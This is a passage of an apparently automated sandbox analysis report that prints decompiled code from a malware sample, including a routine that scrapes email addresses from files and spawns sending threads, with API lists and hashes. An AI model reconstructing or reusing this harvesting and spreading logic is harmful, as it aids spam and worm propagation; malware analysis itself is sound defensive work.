                                                                          								_v1188 = __eax;
                                                                          								__ebx =  &_v300;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__eax = E00404EAE(4);
                                                                          								_v1196 = __eax;
                                                                          								 *__esp = __ebx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								__edx =  &_v76;
                                                                          								asm("cld");
                                                                          								__ecx = 0xa;
                                                                          								__eax = 0;
                                                                          								__edi = __edx;
                                                                          								__eax = memset(__edi, 0, 0xa << 2);
                                                                          								__edi = __edi + __ecx;
                                                                          								__ecx = 0;
                                                                          								_v1204 = 0x40edf7;
                                                                          								_v1208 = __edx;
                                                                          								L0040C328();
                                                                          								__esp = __esp - 8;
                                                                          								_v1072 = 1;
                                                                          								L31:
                                                                          								while(E00404F0A(_t354, _t360) == 0) {
                                                                          									 *_t374 = 0x7530;
                                                                          									Sleep(??);
                                                                          									_t374 = _t374 - 4;
                                                                          								}
                                                                          								_v1152 = _v1072;
                                                                          								_v1156 =  &_v76;
                                                                          								_v1160 =  &_v780;
                                                                          								_v1164 =  &_v508;
                                                                          								_v1168 =  &_v188;
                                                                          								_v1172 =  &_v1068;
                                                                          								 *_t374 =  &_v300;
                                                                          								E00405EE8();
                                                                          								_t358 = 0;
                                                                          								goto L33;
                                                                          						}
                                                                          					}
                                                                          					goto L31;
                                                                          				}
                                                                          				L33:
                                                                          				return _t358;
                                                                          			}











































                                                                          0x00402294
                                                                          0x0040229e
                                                                          0x004022a1
                                                                          0x004022a4
                                                                          0x004022a9
                                                                          0x004022ac
                                                                          0x004022b4
                                                                          0x004022ba
                                                                          0x004022d3
                                                                          0x004022d8
                                                                          0x004022dc
                                                                          0x004022df
                                                                          0x004022e4
                                                                          0x004022e7
                                                                          0x004022ef
                                                                          0x004022f5
                                                                          0x004022f8
                                                                          0x004022fd
                                                                          0x00402301
                                                                          0x0040230f
                                                                          0x00402312
                                                                          0x00402317
                                                                          0x00402323
                                                                          0x00402325
                                                                          0x00402331
                                                                          0x00402337
                                                                          0x0040233f
                                                                          0x00402346
                                                                          0x0040234b
                                                                          0x0040234e
                                                                          0x0040235a
                                                                          0x0040235a
                                                                          0x00402368
                                                                          0x00402370
                                                                          0x00402378
                                                                          0x0040237b
                                                                          0x00402386
                                                                          0x0040238e
                                                                          0x00402396
                                                                          0x00402399
                                                                          0x004023a4
                                                                          0x004023ac
                                                                          0x004023b4
                                                                          0x004023b7
                                                                          0x004023bc
                                                                          0x004023bf
                                                                          0x004023cc
                                                                          0x004023cc
                                                                          0x004023d6
                                                                          0x004023da
                                                                          0x004023dc
                                                                          0x004023df
                                                                          0x004023e7
                                                                          0x004023ef
                                                                          0x004023f2
                                                                          0x00402403
                                                                          0x00402407
                                                                          0x0040240a
                                                                          0x00402412
                                                                          0x0040241a
                                                                          0x0040241d
                                                                          0x00402422
                                                                          0x00402425
                                                                          0x00402431
                                                                          0x00402439
                                                                          0x00402441
                                                                          0x0040244b
                                                                          0x0040244d
                                                                          0x0040245b
                                                                          0x0040245b
                                                                          0x00402461
                                                                          0x00402467
                                                                          0x00000000
                                                                          0x00402475
                                                                          0x0040247f
                                                                          0x00402482
                                                                          0x00402487
                                                                          0x0040248a
                                                                          0x0040249d
                                                                          0x004024a7
                                                                          0x004024aa
                                                                          0x004024af
                                                                          0x004024b2
                                                                          0x004024c5
                                                                          0x004024cf
                                                                          0x004024d2
                                                                          0x004024d7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004024df
                                                                          0x004024e4
                                                                          0x004024e8
                                                                          0x004024ee
                                                                          0x004024f1
                                                                          0x004024f6
                                                                          0x004024f9
                                                                          0x00402500
                                                                          0x00402504
                                                                          0x0040250a
                                                                          0x0040250d
                                                                          0x00402512
                                                                          0x0040251c
                                                                          0x00402528
                                                                          0x0040252c
                                                                          0x00402532
                                                                          0x00402535
                                                                          0x0040253a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402542
                                                                          0x00402549
                                                                          0x0040254d
                                                                          0x00402553
                                                                          0x00402556
                                                                          0x0040255b
                                                                          0x00402565
                                                                          0x00402571
                                                                          0x00402575
                                                                          0x0040257b
                                                                          0x0040257e
                                                                          0x00402583
                                                                          0x00402586
                                                                          0x0040258b
                                                                          0x0040258f
                                                                          0x00402595
                                                                          0x00402598
                                                                          0x0040259d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004025a5
                                                                          0x004025ac
                                                                          0x004025b0
                                                                          0x004025b6
                                                                          0x004025b9
                                                                          0x004025be
                                                                          0x004025c8
                                                                          0x004025d4
                                                                          0x004025d8
                                                                          0x004025de
                                                                          0x004025e1
                                                                          0x004025e6
                                                                          0x004025e9
                                                                          0x004025ee
                                                                          0x004025f2
                                                                          0x004025f8
                                                                          0x004025fb
                                                                          0x00402600
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402608
                                                                          0x0040260f
                                                                          0x00402613
                                                                          0x00402619
                                                                          0x0040261c
                                                                          0x00402621
                                                                          0x0040262b
                                                                          0x00402637
                                                                          0x0040263b
                                                                          0x00402641
                                                                          0x00402644
                                                                          0x00402649
                                                                          0x0040264c
                                                                          0x00402651
                                                                          0x00402655
                                                                          0x0040265b
                                                                          0x0040265e
                                                                          0x00402663
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040266b
                                                                          0x00402672
                                                                          0x00402676
                                                                          0x0040267c
                                                                          0x0040267f
                                                                          0x00402684
                                                                          0x0040268e
                                                                          0x0040269a
                                                                          0x0040269e
                                                                          0x004026a4
                                                                          0x004026a7
                                                                          0x004026ac
                                                                          0x004026af
                                                                          0x004026b4
                                                                          0x004026b8
                                                                          0x004026be
                                                                          0x004026c1
                                                                          0x004026c6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004026ce
                                                                          0x004026d5
                                                                          0x004026d9
                                                                          0x004026df
                                                                          0x004026e2
                                                                          0x004026e7
                                                                          0x004026ea
                                                                          0x004026ef
                                                                          0x004026f3
                                                                          0x004026f9
                                                                          0x004026fc
                                                                          0x00402701
                                                                          0x0040270b
                                                                          0x00402717
                                                                          0x0040271b
                                                                          0x00402721
                                                                          0x00402724
                                                                          0x00402729
                                                                          0x00402733
                                                                          0x0040273f
                                                                          0x00402743
                                                                          0x00402746
                                                                          0x0040274b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402753
                                                                          0x0040275a
                                                                          0x0040275e
                                                                          0x00402764
                                                                          0x00402767
                                                                          0x0040276c
                                                                          0x0040276f
                                                                          0x00402774
                                                                          0x00402778
                                                                          0x0040277e
                                                                          0x00402781
                                                                          0x00402786
                                                                          0x00402790
                                                                          0x0040279c
                                                                          0x004027a0
                                                                          0x004027a6
                                                                          0x004027a9
                                                                          0x004027ae
                                                                          0x004027b8
                                                                          0x004027c4
                                                                          0x004027c8
                                                                          0x004027cb
                                                                          0x004027d0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004027d8
                                                                          0x004027df
                                                                          0x004027e3
                                                                          0x004027e9
                                                                          0x004027ec
                                                                          0x004027f1
                                                                          0x004027f4
                                                                          0x004027f9
                                                                          0x004027fd
                                                                          0x00402803
                                                                          0x00402806
                                                                          0x0040280b
                                                                          0x00402815
                                                                          0x00402821
                                                                          0x00402825
                                                                          0x0040282b
                                                                          0x0040282e
                                                                          0x00402833
                                                                          0x0040283d
                                                                          0x00402849
                                                                          0x0040284d
                                                                          0x00402850
                                                                          0x00402855
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040285d
                                                                          0x00402864
                                                                          0x00402868
                                                                          0x0040286e
                                                                          0x00402871
                                                                          0x00402876
                                                                          0x00402879
                                                                          0x0040287e
                                                                          0x00402882
                                                                          0x00402888
                                                                          0x0040288b
                                                                          0x00402890
                                                                          0x0040289a
                                                                          0x004028a6
                                                                          0x004028aa
                                                                          0x004028b0
                                                                          0x004028b3
                                                                          0x004028b8
                                                                          0x004028c2
                                                                          0x004028ce
                                                                          0x004028d2
                                                                          0x004028d5
                                                                          0x004028da
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004028e2
                                                                          0x004028e9
                                                                          0x004028ed
                                                                          0x004028f3
                                                                          0x004028f6
                                                                          0x004028fb
                                                                          0x004028fe
                                                                          0x00402903
                                                                          0x00402907
                                                                          0x0040290d
                                                                          0x00402910
                                                                          0x00402915
                                                                          0x00402918
                                                                          0x00402920
                                                                          0x00402926
                                                                          0x00402929
                                                                          0x0040292e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402936
                                                                          0x0040293d
                                                                          0x00402941
                                                                          0x00402947
                                                                          0x0040294a
                                                                          0x0040294f
                                                                          0x00402959
                                                                          0x00402965
                                                                          0x00402969
                                                                          0x0040296f
                                                                          0x00402972
                                                                          0x00402977
                                                                          0x00402981
                                                                          0x0040298d
                                                                          0x00402991
                                                                          0x00402997
                                                                          0x0040299a
                                                                          0x0040299f
                                                                          0x004029a9
                                                                          0x004029b5
                                                                          0x004029b9
                                                                          0x004029bc
                                                                          0x004029c1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004029c9
                                                                          0x004029d0
                                                                          0x004029d4
                                                                          0x004029da
                                                                          0x004029dd
                                                                          0x004029e2
                                                                          0x004029ec
                                                                          0x004029f8
                                                                          0x004029fc
                                                                          0x00402a02
                                                                          0x00402a05
                                                                          0x00402a0a
                                                                          0x00402a14
                                                                          0x00402a20
                                                                          0x00402a24
                                                                          0x00402a27
                                                                          0x00402a2c
                                                                          0x00402a2f
                                                                          0x00402a34
                                                                          0x00402a38
                                                                          0x00402a3e
                                                                          0x00402a41
                                                                          0x00402a46
                                                                          0x00402a49
                                                                          0x00402a4c
                                                                          0x00402a4d
                                                                          0x00402a52
                                                                          0x00402a57
                                                                          0x00402a59
                                                                          0x00402a59
                                                                          0x00402a59
                                                                          0x00402a5b
                                                                          0x00402a63
                                                                          0x00402a66
                                                                          0x00402a6b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402a73
                                                                          0x00402a7a
                                                                          0x00402a7e
                                                                          0x00402a84
                                                                          0x00402a87
                                                                          0x00402a8c
                                                                          0x00402a96
                                                                          0x00402aa2
                                                                          0x00402aa6
                                                                          0x00402aac
                                                                          0x00402aaf
                                                                          0x00402ab4
                                                                          0x00402abe
                                                                          0x00402aca
                                                                          0x00402ace
                                                                          0x00402ad1
                                                                          0x00402ad6
                                                                          0x00402ad9
                                                                          0x00402ade
                                                                          0x00402ae2
                                                                          0x00402ae8
                                                                          0x00402aeb
                                                                          0x00402af0
                                                                          0x00402af3
                                                                          0x00402af6
                                                                          0x00402af7
                                                                          0x00402afc
                                                                          0x00402b01
                                                                          0x00402b03
                                                                          0x00402b03
                                                                          0x00402b03
                                                                          0x00402b05
                                                                          0x00402b0d
                                                                          0x00402b10
                                                                          0x00402b15
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402b1d
                                                                          0x00402b24
                                                                          0x00402b28
                                                                          0x00402b2e
                                                                          0x00402b31
                                                                          0x00402b36
                                                                          0x00402b40
                                                                          0x00402b4c
                                                                          0x00402b50
                                                                          0x00402b56
                                                                          0x00402b59
                                                                          0x00402b5e
                                                                          0x00402b68
                                                                          0x00402b74
                                                                          0x00402b78
                                                                          0x00402b7e
                                                                          0x00402b81
                                                                          0x00402b86
                                                                          0x00402b90
                                                                          0x00402b9c
                                                                          0x00402ba0
                                                                          0x00402ba3
                                                                          0x00402ba8
                                                                          0x00402bab
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402bba
                                                                          0x00402bc1
                                                                          0x00402bc5
                                                                          0x00402bcb
                                                                          0x00402bce
                                                                          0x00402bd3
                                                                          0x00402bd6
                                                                          0x00402bdb
                                                                          0x00402bdf
                                                                          0x00402be5
                                                                          0x00402be8
                                                                          0x00402bed
                                                                          0x00402bfe
                                                                          0x00402c78
                                                                          0x00402c84
                                                                          0x00402c88
                                                                          0x00402c8e
                                                                          0x00402c91
                                                                          0x00402c96
                                                                          0x00402ca0
                                                                          0x00402cac
                                                                          0x00402cb0
                                                                          0x00402cb3
                                                                          0x00402cb8
                                                                          0x00402cbb
                                                                          0x00402cbe
                                                                          0x00402cbf
                                                                          0x00402cc4
                                                                          0x00402cc9
                                                                          0x00402ccb
                                                                          0x00402ccb
                                                                          0x00402ccb
                                                                          0x00402ccd
                                                                          0x00402cd5
                                                                          0x00402cd8
                                                                          0x00402cdd
                                                                          0x00402c00
                                                                          0x00402c07
                                                                          0x00402c13
                                                                          0x00402c17
                                                                          0x00402c1d
                                                                          0x00402c20
                                                                          0x00402c25
                                                                          0x00402c2f
                                                                          0x00402c3b
                                                                          0x00402c3f
                                                                          0x00402c42
                                                                          0x00402c47
                                                                          0x00402c4a
                                                                          0x00402c4d
                                                                          0x00402c4e
                                                                          0x00402c53
                                                                          0x00402c58
                                                                          0x00402c5a
                                                                          0x00402c5a
                                                                          0x00402c5a
                                                                          0x00402c5c
                                                                          0x00402c64
                                                                          0x00402c67
                                                                          0x00402c6c
                                                                          0x00402c6c
                                                                          0x00402ce0
                                                                          0x00402ce8
                                                                          0x00402cee
                                                                          0x00402cf1
                                                                          0x00402cf6
                                                                          0x00402cfa
                                                                          0x00402d02
                                                                          0x00402d08
                                                                          0x00402d0b
                                                                          0x00402d10
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402d1f
                                                                          0x00402d26
                                                                          0x00402d2a
                                                                          0x00402d30
                                                                          0x00402d33
                                                                          0x00402d38
                                                                          0x00402d3b
                                                                          0x00402d40
                                                                          0x00402d44
                                                                          0x00402d4a
                                                                          0x00402d4d
                                                                          0x00402d52
                                                                          0x00402d5c
                                                                          0x00402d68
                                                                          0x00402d6c
                                                                          0x00402d72
                                                                          0x00402d75
                                                                          0x00402d7a
                                                                          0x00402d84
                                                                          0x00402d90
                                                                          0x00402d94
                                                                          0x00402d97
                                                                          0x00402d9c
                                                                          0x00402d9f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402dae
                                                                          0x00402db5
                                                                          0x00402db9
                                                                          0x00402dbf
                                                                          0x00402dc2
                                                                          0x00402dc7
                                                                          0x00402dca
                                                                          0x00402dcf
                                                                          0x00402dd3
                                                                          0x00402dd9
                                                                          0x00402ddc
                                                                          0x00402de1
                                                                          0x00402de4
                                                                          0x00402de9
                                                                          0x00402ded
                                                                          0x00402df3
                                                                          0x00402df6
                                                                          0x00402dfb
                                                                          0x00402dfe
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402e0d
                                                                          0x00402e14
                                                                          0x00402e18
                                                                          0x00402e1e
                                                                          0x00402e21
                                                                          0x00402e26
                                                                          0x00402e29
                                                                          0x00402e2e
                                                                          0x00402e32
                                                                          0x00402e38
                                                                          0x00402e3b
                                                                          0x00402e40
                                                                          0x00402e4a
                                                                          0x00402e56
                                                                          0x00402e5a
                                                                          0x00402e60
                                                                          0x00402e63
                                                                          0x00402e68
                                                                          0x00402e72
                                                                          0x00402e7e
                                                                          0x00402e82
                                                                          0x00402e85
                                                                          0x00402e8a
                                                                          0x00402e8d
                                                                          0x00402e90
                                                                          0x00402e91
                                                                          0x00402e96
                                                                          0x00402e9b
                                                                          0x00402e9d
                                                                          0x00402e9d
                                                                          0x00402e9d
                                                                          0x00402e9f
                                                                          0x00402ea7
                                                                          0x00402eaa
                                                                          0x00402eaf
                                                                          0x00402eb2
                                                                          0x00000000
                                                                          0x00402ecd
                                                                          0x00402ebe
                                                                          0x00402ec5
                                                                          0x00402eca
                                                                          0x00402eca
                                                                          0x00402edc
                                                                          0x00402ee3
                                                                          0x00402eed
                                                                          0x00402ef7
                                                                          0x00402f01
                                                                          0x00402f0b
                                                                          0x00402f15
                                                                          0x00402f18
                                                                          0x00402f1d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402467
                                                                          0x00000000
                                                                          0x00402461
                                                                          0x00402f22
                                                                          0x00402f2b

                                                                          APIs
                                                                          • lstrlen.KERNEL32 ref: 004022A4
                                                                          • memset.MSVCRT ref: 004022D3
                                                                          • lstrcpy.KERNEL32 ref: 004022DF
                                                                            • Part of subcall function 00404620: memset.MSVCRT ref: 0040463D
                                                                            • Part of subcall function 00404620: GetSystemDirectoryA.KERNEL32 ref: 00404649
                                                                            • Part of subcall function 00404620: lstrlen.KERNEL32 ref: 00404654
                                                                            • Part of subcall function 00404620: lstrcat.KERNEL32 ref: 0040466E
                                                                            • Part of subcall function 00404620: lstrcat.KERNEL32 ref: 00404680
                                                                            • Part of subcall function 00404EAE: GetTickCount.KERNEL32 ref: 00404EB8
                                                                            • Part of subcall function 00404EAE: srand.MSVCRT ref: 00404EC0
                                                                            • Part of subcall function 00404EAE: rand.MSVCRT ref: 00404EC5
                                                                          • Sleep.KERNEL32 ref: 00402346
                                                                          • memset.MSVCRT ref: 0040237B
                                                                          • memset.MSVCRT ref: 00402399
                                                                          • memset.MSVCRT ref: 004023B7
                                                                          • lstrcat.KERNEL32 ref: 004023DF
                                                                          • lstrcat.KERNEL32 ref: 004023F2
                                                                          • lstrcat.KERNEL32 ref: 0040240A
                                                                          • lstrcat.KERNEL32 ref: 0040241D
                                                                          • strstr.MSVCRT ref: 00402444
                                                                          • lstrcat.KERNEL32 ref: 00402482
                                                                          • lstrcat.KERNEL32 ref: 004024AA
                                                                          • Sleep.KERNEL32 ref: 00402EC5
                                                                          • lstrcat.KERNEL32 ref: 004024D2
                                                                            • Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
                                                                            • Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
                                                                            • Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcat$memset$Sleeplstrlen$ConnectedCountDirectoryHandleInternetLibraryLoadModuleStateSystemTicklstrcpyrandsrandstrstr
                                                                          • String ID: .ru$.zip$8@$N@$X@$_@$d$mvcsv.qyy$s@$@
                                                                          • API String ID: 4149311011-1716888737
                                                                          • Opcode ID: 82a7f4e0260fffa1f0f466a90b3f801e1f1f1262122d3127c8101c14a427f6ab
                                                                          • Instruction ID: c4b552956d8c88359d0401bfea8a3880dfb39e4fafa2b11eb934faa6a3ed69b2
                                                                          • Opcode Fuzzy Hash: 82a7f4e0260fffa1f0f466a90b3f801e1f1f1262122d3127c8101c14a427f6ab
                                                                          • Instruction Fuzzy Hash: 27F1DBB5814304CBCB10BF75D98569DBBF0BB84304F41897EE9C8A7291EB389698CF56
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: rand$CountTicksrand$LocalTime$_itoa
                                                                          • String ID: 1$abcdefghijklmnopqrstuvwxyz
                                                                          • API String ID: 1825045967-2454072292
                                                                          • Opcode ID: 4f87a31ff910bbbb76765ae44f831347ed66564e87c85ef04c6c44d63fd729d0
                                                                          • Instruction ID: 02076846e8c8a6e31432f83e4ba7e8d02048c9f1cba05857c09831ad89ea6e40
                                                                          • Opcode Fuzzy Hash: 4f87a31ff910bbbb76765ae44f831347ed66564e87c85ef04c6c44d63fd729d0
                                                                          • Instruction Fuzzy Hash: 05818271D10255CECB20EFFDC9855AEBBF0EF44304F04827EE884EB686E63859458B99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 58%
                                                                          			E0040307E(signed int __edx, char* _a4) {
                                                                          				void* _v16;
                                                                          				char _v236;
                                                                          				char _v237;
                                                                          				char _v240;
                                                                          				int _v244;
                                                                          				int _v248;
                                                                          				char* _v268;
                                                                          				int _v272;
                                                                          				char* _v276;
                                                                          				intOrPtr _v280;
                                                                          				int _v284;
                                                                          				void* __ebx;
                                                                          				int _t64;
                                                                          				int _t69;
                                                                          				long _t71;
                                                                          				int _t77;
                                                                          				signed int _t80;
                                                                          				signed int _t81;
                                                                          				int _t83;
                                                                          				int _t92;
                                                                          				int _t95;
                                                                          				signed int _t97;
                                                                          				int _t99;
                                                                          				int _t100;
                                                                          				int _t101;
                                                                          				int _t102;
                                                                          				int _t103;
                                                                          				signed int _t104;
                                                                          				signed int _t107;
                                                                          				long _t110;
                                                                          				struct _IO_FILE* _t111;
                                                                          				struct _IO_FILE* _t112;
                                                                          				int* _t113;
                                                                          				intOrPtr* _t114;
                                                                          
                                                                          				_t104 = __edx;
                                                                          				_v244 = 0;
                                                                          				_t110 = 0;
                                                                          				_t111 = fopen(_a4, 0x40efaf);
                                                                          				_t64 = 0;
                                                                          				if(_t111 == 0) {
                                                                          					L50:
                                                                          					return _t64;
                                                                          				}
                                                                          				while(fgetc(_t111) != 0xffffffff) {
                                                                          					_v244 = _v244 + 1;
                                                                          				}
                                                                          				fclose(_t111);
                                                                          				_t112 = fopen(_a4, 0x40efaf);
                                                                          				_t64 = 0;
                                                                          				if(_t112 == 0) {
                                                                          					goto L50;
                                                                          				}
                                                                          				while(1) {
                                                                          					L47:
                                                                          					_t69 = fgetc(_t112);
                                                                          					_t99 = _t69;
                                                                          					if(_t69 == 0xffffffff || _t110 > _v244) {
                                                                          						break;
                                                                          					}
                                                                          					if(_t99 != 0x40) {
                                                                          						continue;
                                                                          					}
                                                                          					_t71 = ftell(_t112);
                                                                          					_t8 = _t71 - 1; // -1
                                                                          					_t110 = _t8;
                                                                          					if(_t110 > 0) {
                                                                          						_t9 = _t71 - 2; // -2
                                                                          						_t110 = _t9;
                                                                          					}
                                                                          					fseek(_t112, _t110, 0);
                                                                          					_t100 = fgetc(_t112);
                                                                          					while(1) {
                                                                          						_t14 = _t100 - 0x61; // -97
                                                                          						_t17 = _t100 - 0x41; // -65
                                                                          						_t104 = _t104 & 0xffffff00 | _t14 - 0x00000019 < 0x00000000 | _t17 & 0xffffff00 | _t17 - 0x00000019 < 0x00000000;
                                                                          						if(_t104 != 0) {
                                                                          							goto L11;
                                                                          						}
                                                                          						L15:
                                                                          						_t20 = _t100 - 0x30; // -48
                                                                          						_t97 = _t20;
                                                                          						if(_t97 <= 9) {
                                                                          							goto L11;
                                                                          						}
                                                                          						_t104 = _t104 & 0xffffff00 | _t100 == 0x0000005f | _t97 & 0xffffff00 | _t100 == 0x0000002d;
                                                                          						if(_t104 == 0 && _t100 != 0x2e) {
                                                                          							L18:
                                                                          							_v248 = 0;
                                                                          							while(1) {
                                                                          								_t77 = fgetc(_t112);
                                                                          								_t101 = _t77;
                                                                          								if(_t77 == 0xffffffff) {
                                                                          									break;
                                                                          								}
                                                                          								_t103 = 0;
                                                                          								_t26 = _t101 - 0x61; // -97
                                                                          								if(_t26 <= 0x19) {
                                                                          									_t103 = 1;
                                                                          								}
                                                                          								_t27 = _t101 - 0x41; // -65
                                                                          								if(_t27 <= 0x19) {
                                                                          									_t103 = 1;
                                                                          								}
                                                                          								_t28 = _t101 - 0x30; // -48
                                                                          								_t80 = _t28;
                                                                          								if(_t80 <= 9) {
                                                                          									_t103 = 1;
                                                                          								}
                                                                          								_t81 = _t80 & 0xffffff00 | _t101 == 0x0000002d;
                                                                          								_t107 = _t104 & 0xffffff00 | _t101 == 0x0000005f | _t81;
                                                                          								if(_t107 != 0) {
                                                                          									_t103 = 1;
                                                                          								}
                                                                          								_t104 = _t107 & 0xffffff00 | _t101 == 0x00000040 | _t81 & 0xffffff00 | _t101 == 0x0000002e;
                                                                          								if(_t104 != 0) {
                                                                          									_t103 = 1;
                                                                          								}
                                                                          								if(_t103 == 0) {
                                                                          									break;
                                                                          								} else {
                                                                          									_t92 = _v248;
                                                                          									 *(_t92 +  &_v236) = _t101;
                                                                          									_v248 = _t92 + 1;
                                                                          									continue;
                                                                          								}
                                                                          							}
                                                                          							_t83 = _v248;
                                                                          							 *((char*)(_t83 +  &_v236)) = 0;
                                                                          							if( *((char*)(_t83 +  &_v237)) == 0x40) {
                                                                          								goto L47;
                                                                          							}
                                                                          							_t102 =  &_v236;
                                                                          							_v284 = _t102;
                                                                          							L0040C310();
                                                                          							_t113 = _t113 - 4;
                                                                          							if(_t83 > 9 &&  *((char*)(_v248 +  &_v237)) != 0x2e && _v236 != 0x40 && _v236 != 0x2e && _v236 != 0x2d) {
                                                                          								 *_t113 = _t102;
                                                                          								if(E00403008() == 0) {
                                                                          									goto L47;
                                                                          								}
                                                                          								 *_t113 = _t102;
                                                                          								if(E00402FC2(_t85, _t102) == 0) {
                                                                          									goto L47;
                                                                          								}
                                                                          								 *_t113 = _t102;
                                                                          								if(E0040305A() == 0) {
                                                                          									goto L47;
                                                                          								}
                                                                          								while(E00404F0A(_t102, _t104) == 0) {
                                                                          									 *_t113 = 0x7530;
                                                                          									Sleep(??);
                                                                          									_t113 = _t113 - 4;
                                                                          								}
                                                                          								_v268 =  &_v240;
                                                                          								_v272 = 0;
                                                                          								_v276 =  &_v236;
                                                                          								_v280 = E00402288;
                                                                          								_v284 = 0;
                                                                          								 *_t113 = 0;
                                                                          								CreateThread(??, ??, ??, ??, ??, ??);
                                                                          								_t114 = _t113 - 0x18;
                                                                          								 *_t114 = 0x28;
                                                                          								Sleep(??);
                                                                          								_t113 = _t114 - 4;
                                                                          								if( *0x414018 == 4) {
                                                                          									 *0x414018 = 0;
                                                                          									 *_t113 = 0xfa0;
                                                                          									Sleep(??);
                                                                          									_t113 = _t113 - 4;
                                                                          								}
                                                                          								 *0x414018 =  *0x414018 + 1;
                                                                          							}
                                                                          							goto L47;
                                                                          						}
                                                                          						L11:
                                                                          						if(_t110 == 0) {
                                                                          							rewind(_t112);
                                                                          							goto L18;
                                                                          						}
                                                                          						_t110 = _t110 - 1;
                                                                          						fseek(_t112, _t110, 0);
                                                                          						_t95 = fgetc(_t112);
                                                                          						_t100 = _t95;
                                                                          						if(_t95 == 0xffffffff) {
                                                                          							fclose(_t112);
                                                                          						}
                                                                          						_t14 = _t100 - 0x61; // -97
                                                                          						_t17 = _t100 - 0x41; // -65
                                                                          						_t104 = _t104 & 0xffffff00 | _t14 - 0x00000019 < 0x00000000 | _t17 & 0xffffff00 | _t17 - 0x00000019 < 0x00000000;
                                                                          						if(_t104 != 0) {
                                                                          							goto L11;
                                                                          						}
                                                                          						goto L15;
                                                                          					}
                                                                          				}
                                                                          				fclose(_t112);
                                                                          				_t64 = 0;
                                                                          				goto L50;
                                                                          			}





































                                                                          0x0040307e
                                                                          0x0040308a
                                                                          0x00403094
                                                                          0x004030ac
                                                                          0x004030ae
                                                                          0x004030b5
                                                                          0x00403388
                                                                          0x0040338f
                                                                          0x0040338f
                                                                          0x004030c3
                                                                          0x004030bd
                                                                          0x004030bd
                                                                          0x004030d3
